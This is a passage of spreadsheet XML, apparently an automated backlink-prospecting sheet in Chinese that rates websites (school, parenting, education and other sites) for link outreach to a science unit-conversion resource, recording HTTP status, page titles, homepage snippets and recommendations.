      <x:c r="J113" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K113" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L113" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M113" s="19" t="str">
        <x:v>https://barleyandbirch.com/</x:v>
      </x:c>
      <x:c r="N113" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O113" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P113" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q113" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R113" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S113" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T113" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://barleyandbirch.com</x:v>
      </x:c>
    </x:row>
    <x:row r="114">
      <x:c r="A114" s="18" t="str">
        <x:v>113</x:v>
      </x:c>
      <x:c r="B114" s="19" t="str">
        <x:v>cmadocs.org</x:v>
      </x:c>
      <x:c r="C114" s="19" t="str">
        <x:v>https://cmadocs.org</x:v>
      </x:c>
      <x:c r="D114" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E114" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F114" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G114" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H114" s="19" t="str">
        <x:v>https://cmadocs.org/</x:v>
      </x:c>
      <x:c r="I114" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J114" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K114" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L114" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M114" s="19" t="str">
        <x:v>https://cmadocs.org/</x:v>
      </x:c>
      <x:c r="N114" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O114" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P114" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q114" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access cmadocs.org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a349b925a99b4eaa &amp;bull; Your IP: Click to </x:v>
      </x:c>
      <x:c r="R114" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S114" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T114" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://cmadocs.org</x:v>
      </x:c>
    </x:row>
    <x:row r="115">
      <x:c r="A115" s="18" t="str">
        <x:v>114</x:v>
      </x:c>
      <x:c r="B115" s="19" t="str">
        <x:v>activitiesforfamilies.com</x:v>
      </x:c>
      <x:c r="C115" s="19" t="str">
        <x:v>https://activitiesforfamilies.com</x:v>
      </x:c>
      <x:c r="D115" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E115" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F115" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G115" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H115" s="19" t="str">
        <x:v>https://activitiesforfamilies.com/</x:v>
      </x:c>
      <x:c r="I115" s="19" t="str">
        <x:v>Pretend play- How to enjoy it</x:v>
      </x:c>
      <x:c r="J115" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K115" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L115" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M115" s="19" t="str">
        <x:v>https://activitiesforfamilies.com/</x:v>
      </x:c>
      <x:c r="N115" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O115" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P115" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q115" s="21" t="str">
        <x:v>Pretend play- How to enjoy it Playful Parents Rock The Brilliance of a YES Space Playful Parenting Tips and Ideas Play Matters Pretend play- How to enjoy it Building Language During Play Sensory Play -Playful Parent What is Open Ended Play? Tips for playing with your kids Parenting Tips Understanding Play Discovering your child's interest Homeschool Basics How to play with your baby Parenting Guides Handy Links for Parents Classic Functional Play Outdoor Adventures Easy Backyard Nature Activities Backyard Wonderland Nature Activities for Todays Youth Spying on Animals in the Great Outdoors Exploring the Beach and Shorelines Nature Play in the Forest Wild Water and Wetland Explorations Nature</x:v>
      </x:c>
      <x:c r="R115" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S115" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T115" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://activitiesforfamilies.com</x:v>
      </x:c>
    </x:row>
    <x:row r="116">
      <x:c r="A116" s="18" t="str">
        <x:v>115</x:v>
      </x:c>
      <x:c r="B116" s="19" t="str">
        <x:v>rhiwbeinaprm.co.uk</x:v>
      </x:c>
      <x:c r="C116" s="19" t="str">
        <x:v>https://rhiwbeinaprm.co.uk</x:v>
      </x:c>
      <x:c r="D116" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E116" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F116" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G116" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H116" s="19" t="str">
        <x:v>https://www.rhiwbeinaprm.co.uk/</x:v>
      </x:c>
      <x:c r="I116" s="19" t="str">
        <x:v>Rhiwbeina Primary School - Home</x:v>
      </x:c>
      <x:c r="J116" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K116" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L116" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M116" s="19" t="str">
        <x:v>https://www.rhiwbeinaprm.co.uk/</x:v>
      </x:c>
      <x:c r="N116" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O116" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P116" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q116" s="21" t="str">
        <x:v>Rhiwbeina Primary School - Home Skip to content &amp;darr; Menu Search Translate Website Menu Home About Us Headteachers Welcome Our Team Our Vision Key Information Calendar Contact Us Curriculum Estyn Reports School Prospectus School Policies Newsletters Our Classes School Development Parents Online Office Parent Information Portal Children Cymraeg Eco Junior PCSO Mini Ambassadors Ollie's Library School Council SNAG UNCRC Virtual Library Community Bethel Church Creative Crafters Cricket Food Bank Friends of Rhiwbeina Local Events Rhiwbeina Tennis School Governors School Tour Rhiwbeina Primary School Together Everyone Achieves More Quicklinks Quicklinks Purple Mash Class Dojo Online Office Conta</x:v>
      </x:c>
      <x:c r="R116" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S116" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T116" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://rhiwbeinaprm.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="117">
      <x:c r="A117" s="18" t="str">
        <x:v>116</x:v>
      </x:c>
      <x:c r="B117" s="19" t="str">
        <x:v>maxlinen.com.au</x:v>
      </x:c>
      <x:c r="C117" s="19" t="str">
        <x:v>https://maxlinen.com.au</x:v>
      </x:c>
      <x:c r="D117" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E117" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F117" s="20"/>
      <x:c r="G117" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H117" s="19" t="str"/>
      <x:c r="I117" s="19" t="str"/>
      <x:c r="J117" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K117" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L117" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M117" s="19" t="str">
        <x:v>https://maxlinen.com.au</x:v>
      </x:c>
      <x:c r="N117" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O117" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P117" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q117" s="21" t="str"/>
      <x:c r="R117" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S117" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T117" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://maxlinen.com.au
http://maxlinen.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="118">
      <x:c r="A118" s="18" t="str">
        <x:v>117</x:v>
      </x:c>
      <x:c r="B118" s="19" t="str">
        <x:v>mamaofmanyblessings.com</x:v>
      </x:c>
      <x:c r="C118" s="19" t="str">
        <x:v>https://mamaofmanyblessings.com</x:v>
      </x:c>
      <x:c r="D118" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E118" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F118" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G118" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H118" s="19" t="str">
        <x:v>https://mamaofmanyblessings.com/</x:v>
      </x:c>
      <x:c r="I118" s="19" t="str"/>
      <x:c r="J118" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K118" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L118" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M118" s="19" t="str">
        <x:v>https://mamaofmanyblessings.com/</x:v>
      </x:c>
      <x:c r="N118" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O118" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P118" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q118" s="21" t="str"/>
      <x:c r="R118" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S118" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T118" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://mamaofmanyblessings.com</x:v>
      </x:c>
    </x:row>
    <x:row r="119">
      <x:c r="A119" s="18" t="str">
        <x:v>118</x:v>
      </x:c>
      <x:c r="B119" s="19" t="str">
        <x:v>educationcorner.com</x:v>
      </x:c>
      <x:c r="C119" s="19" t="str">
        <x:v>https://educationcorner.com</x:v>
      </x:c>
      <x:c r="D119" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E119" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F119" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G119" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H119" s="19" t="str">
        <x:v>https://www.educationcorner.com/</x:v>
      </x:c>
      <x:c r="I119" s="19" t="str">
        <x:v>Education Corner - Education That Matters</x:v>
      </x:c>
      <x:c r="J119" s="19" t="str">
        <x:v>教育资源站</x:v>
      </x:c>
      <x:c r="K119" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="L119" s="19" t="str">
        <x:v>公开资源建议</x:v>
      </x:c>
      <x:c r="M119" s="19" t="str">
        <x:v>https://www.educationcorner.com/about/</x:v>
      </x:c>
      <x:c r="N119" s="19" t="str">
        <x:v>可做</x:v>
      </x:c>
      <x:c r="O119" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="P119" s="21" t="str">
        <x:v>公开邀请教师、教授或其他人提交教育资源建议；需编辑审核。适合以免费科学单位换算资源的形式推荐。</x:v>
      </x:c>
      <x:c r="Q119" s="21" t="str">
        <x:v>Online guide to higher education, distance learning, k12 education, early childhood education, special education and teaching resources. Education Corner - Education That Matters Skip to content Menu Higher Education Distance Learning K12 Education Early Childhood Special Education Teacher’s Corner Education Corner – Education That Matters Welcome to EducationCorner.com. Whether you’re a high school student looking for the best college to attend, a teacher looking for new lesson ideas, a professional seeking career training programs, or a mom searching for the best homeschooling resources for your children, we’re confident that EducationCorner.com will be helpful to you. Top 100 Colleges and Universities Top 100 Most Affordable Universities Top 100 Most Affordable Colleges Top 100 Highest Acceptance Top 100 Lowest Acceptance </x:v>
      </x:c>
      <x:c r="R119" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S119" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T119" s="21" t="str">
        <x:v>建议链接到 /en/about 或具体换算页面，不要只发首页。 | 请求: https://educationcorner.com</x:v>
      </x:c>
    </x:row>
    <x:row r="120">
      <x:c r="A120" s="18" t="str">
        <x:v>119</x:v>
      </x:c>
      <x:c r="B120" s="19" t="str">
        <x:v>diyblissful.com</x:v>
      </x:c>
      <x:c r="C120" s="19" t="str">
        <x:v>https://diyblissful.com</x:v>
      </x:c>
      <x:c r="D120" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E120" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F120" s="20"/>
      <x:c r="G120" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H120" s="19" t="str"/>
      <x:c r="I120" s="19" t="str"/>
      <x:c r="J120" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K120" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L120" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M120" s="19" t="str">
        <x:v>https://diyblissful.com</x:v>
      </x:c>
      <x:c r="N120" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O120" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P120" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q120" s="21" t="str"/>
      <x:c r="R120" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S120" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T120" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://diyblissful.com
http://diyblissful.com</x:v>
      </x:c>
    </x:row>
    <x:row r="121">
      <x:c r="A121" s="18" t="str">
        <x:v>120</x:v>
      </x:c>
      <x:c r="B121" s="19" t="str">
        <x:v>ibelieve.com</x:v>
      </x:c>
      <x:c r="C121" s="19" t="str">
        <x:v>https://ibelieve.com</x:v>
      </x:c>
      <x:c r="D121" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E121" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F121" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G121" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H121" s="19" t="str">
        <x:v>https://www.ibelieve.com/</x:v>
      </x:c>
      <x:c r="I121" s="19" t="str">
        <x:v>iBelieve - Christian Women Inspirational Devotionals | iBelieve.com</x:v>
      </x:c>
      <x:c r="J121" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K121" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L121" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M121" s="19" t="str">
        <x:v>https://www.ibelieve.com/</x:v>
      </x:c>
      <x:c r="N121" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O121" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P121" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q121" s="21" t="str">
        <x:v>Be inspired with devotions and inspiration for Christian women. Daily articles, devotionals, bible study, recipes and more only on iBelieve! iBelieve - Christian Women Inspirational Devotionals | iBelieve.com Open main menu Topics Christian Living Video Printables Church &amp; Theology Relationships Motherhood Career &amp; Calling Health &amp; Beauty Food &amp; Home Holidays Slideshows Your Daily Verse Devotionals Contact Us About Us Write for Us Help Newsletters Plus PLUS Log In JOIN PLUS PLUS Log In JOIN PLUS Christian Living Video Printables Church &amp; Theology Relationships Motherhood Career &amp; Calling Health &amp; Beauty Food &amp; Home Holidays Slideshows Your Daily Verse Devotionals About Us Write for Us Help Newsletters How to Stand Strong When You Feel Spiritually Attacked How to Stand Strong When You Feel Spiritually Attacked Debbie McDaniel 5 Si</x:v>
      </x:c>
      <x:c r="R121" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S121" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T121" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://ibelieve.com</x:v>
      </x:c>
    </x:row>
    <x:row r="122">
      <x:c r="A122" s="18" t="str">
        <x:v>121</x:v>
      </x:c>
      <x:c r="B122" s="19" t="str">
        <x:v>peoriaplayhouse.org</x:v>
      </x:c>
      <x:c r="C122" s="19" t="str">
        <x:v>https://peoriaplayhouse.org</x:v>
      </x:c>
      <x:c r="D122" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E122" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F122" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G122" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H122" s="19" t="str">
        <x:v>https://peoriaplayhouse.org/</x:v>
      </x:c>
      <x:c r="I122" s="19" t="str">
        <x:v>Home - Peoria PlayHouse</x:v>
      </x:c>
      <x:c r="J122" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K122" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L122" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M122" s="19" t="str">
        <x:v>https://peoriaplayhouse.org/</x:v>
      </x:c>
      <x:c r="N122" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O122" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P122" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q122" s="21" t="str">
        <x:v>Home - Peoria PlayHouse Home - Peoria PlayHouse The Museum is CLOSED! The Museum is currently closed for construction. Learn more here! X Please Note: Strollers are Not Allowed Read more about this and other museum policies here. X Alerts Careers About Us Our Mission Approach to Play Meet the Team Careers Contact Us What’s Happening Upcoming Events Construction Updates Exhibits &amp; Programs Exhibits Programs Hands-On Workshops Support Us Memberships Donate Volunteer Shop Visit Hours &amp; Admission Plan Your Party Field trips Accessibility Shop Membership About Us Our Mission Approach to Play Meet the Team Careers Contact Us What’s Happening Upcoming Events Construction Updates Exhibits &amp; Programs</x:v>
      </x:c>
      <x:c r="R122" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S122" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T122" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://peoriaplayhouse.org</x:v>
      </x:c>
    </x:row>
    <x:row r="123">
      <x:c r="A123" s="18" t="str">
        <x:v>122</x:v>
      </x:c>
      <x:c r="B123" s="19" t="str">
        <x:v>moojeegae.com</x:v>
      </x:c>
      <x:c r="C123" s="19" t="str">
        <x:v>https://moojeegae.com</x:v>
      </x:c>
      <x:c r="D123" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E123" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F123" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G123" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H123" s="19" t="str">
        <x:v>https://moojeegae.com/</x:v>
      </x:c>
      <x:c r="I123" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J123" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K123" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L123" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M123" s="19" t="str">
        <x:v>https://moojeegae.com/</x:v>
      </x:c>
      <x:c r="N123" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O123" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P123" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q123" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access moojeegae.com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a349b92b8f7b49a8 &amp;bull; Your IP: Click t</x:v>
      </x:c>
      <x:c r="R123" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S123" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T123" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://moojeegae.com</x:v>
      </x:c>
    </x:row>
    <x:row r="124">
      <x:c r="A124" s="18" t="str">
        <x:v>123</x:v>
      </x:c>
      <x:c r="B124" s="19" t="str">
        <x:v>joyfulbunny.com</x:v>
      </x:c>
      <x:c r="C124" s="19" t="str">
        <x:v>https://joyfulbunny.com</x:v>
      </x:c>
      <x:c r="D124" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E124" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F124" s="20"/>
      <x:c r="G124" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H124" s="19" t="str"/>
      <x:c r="I124" s="19" t="str"/>
      <x:c r="J124" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K124" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L124" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M124" s="19" t="str">
        <x:v>https://joyfulbunny.com</x:v>
      </x:c>
      <x:c r="N124" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O124" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P124" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q124" s="21" t="str"/>
      <x:c r="R124" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S124" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T124" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://joyfulbunny.com
http://joyfulbunny.com</x:v>
      </x:c>
    </x:row>
    <x:row r="125">
      <x:c r="A125" s="18" t="str">
        <x:v>124</x:v>
      </x:c>
      <x:c r="B125" s="19" t="str">
        <x:v>twinkl.com.br</x:v>
      </x:c>
      <x:c r="C125" s="19" t="str">
        <x:v>https://twinkl.com.br</x:v>
      </x:c>
      <x:c r="D125" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E125" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F125" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G125" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H125" s="19" t="str">
        <x:v>https://www.twinkl.com.br/</x:v>
      </x:c>
      <x:c r="I125" s="19" t="str"/>
      <x:c r="J125" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K125" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L125" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M125" s="19" t="str">
        <x:v>https://www.twinkl.com.br/</x:v>
      </x:c>
      <x:c r="N125" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O125" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P125" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q125" s="21" t="str"/>
      <x:c r="R125" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S125" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T125" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.com.br</x:v>
      </x:c>
    </x:row>
    <x:row r="126">
      <x:c r="A126" s="18" t="str">
        <x:v>125</x:v>
      </x:c>
      <x:c r="B126" s="19" t="str">
        <x:v>ibjcn.com</x:v>
      </x:c>
      <x:c r="C126" s="19" t="str">
        <x:v>https://ibjcn.com</x:v>
      </x:c>
      <x:c r="D126" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E126" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F126" s="20"/>
      <x:c r="G126" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H126" s="19" t="str"/>
      <x:c r="I126" s="19" t="str"/>
      <x:c r="J126" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K126" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L126" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M126" s="19" t="str">
        <x:v>https://ibjcn.com</x:v>
      </x:c>
      <x:c r="N126" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O126" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P126" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q126" s="21" t="str"/>
      <x:c r="R126" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S126" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T126" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://ibjcn.com
http://ibjcn.com</x:v>
      </x:c>
    </x:row>
    <x:row r="127">
      <x:c r="A127" s="18" t="str">
        <x:v>126</x:v>
      </x:c>
      <x:c r="B127" s="19" t="str">
        <x:v>everblocksystems.com</x:v>
      </x:c>
      <x:c r="C127" s="19" t="str">
        <x:v>https://everblocksystems.com</x:v>
      </x:c>
      <x:c r="D127" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E127" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F127" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G127" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H127" s="19" t="str">
        <x:v>https://www.everblocksystems.com/</x:v>
      </x:c>
      <x:c r="I127" s="19" t="str">
        <x:v>Modular Building Blocks for Partioning &amp; More | EverBlock Systems</x:v>
      </x:c>
      <x:c r="J127" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K127" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L127" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M127" s="19" t="str">
        <x:v>https://www.everblocksystems.com/</x:v>
      </x:c>
      <x:c r="N127" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O127" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P127" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q127" s="21" t="str">
